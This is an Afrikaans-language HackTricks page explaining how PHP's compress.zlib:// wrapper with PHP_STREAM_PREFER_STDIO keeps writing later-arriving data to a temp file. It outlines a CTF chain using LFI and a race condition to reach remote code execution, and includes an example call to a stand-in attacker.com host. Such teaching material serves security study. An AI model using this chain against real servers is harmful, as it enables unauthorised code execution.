4.2 KiB
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.
compress.zlib://
en PHP_STREAM_PREFER_STDIO
'n Lêer wat geopen word met die protokol compress.zlib://
met die vlag PHP_STREAM_PREFER_STDIO
kan voortgaan om data wat later by die verbinding aankom, na dieselfde lêer te skryf.
Dit beteken dat 'n oproep soos:
file_get_contents("compress.zlib://http://attacker.com/file")
Sal stuur 'n versoek om http://attacker.com/file, dan kan die bediener die versoek beantwoord met 'n geldige HTTP-antwoord, die verbinding oop hou en later ekstra data stuur wat ook in die lêer geskryf sal word.
Jy kan daardie inligting sien in hierdie deel van die php-src-kode in main/streams/cast.c:
/* Use a tmpfile and copy the old streams contents into it */
if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
}
Race Voorwaarde tot RCE
Hierdie CTF is opgelos deur gebruik te maak van die vorige truuk.
Die aanvaller sal die slagofferbediener dwing om 'n verbinding oop te maak en 'n lêer van die aanvaller se bediener te lees deur gebruik te maak van die compress.zlib
protokol.
Terwyl hierdie verbinding bestaan, sal die aanvaller die pad na die tydelike lêer wat geskep is, uitlek (dit word deur die bediener uitgelek).
Terwyl die verbinding nog oop is, sal die aanvaller 'n LFI uitbuit deur die tydelike lêer te laai wat hy beheer.
Daar is egter 'n kontrole in die webbediener wat verhoed dat lêers gelaai word wat <?
bevat. Daarom sal die aanvaller 'n Race Voorwaarde misbruik. In die verbinding wat nog oop is, sal die aanvaller die PHP-payload NA die webbediener stuur het gekontroleer of die lêer die verbode karakters bevat, maar VOORDAT dit sy inhoud laai.
Vir meer inligting, kyk na die beskrywing van die Race Voorwaarde en die CTF by https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.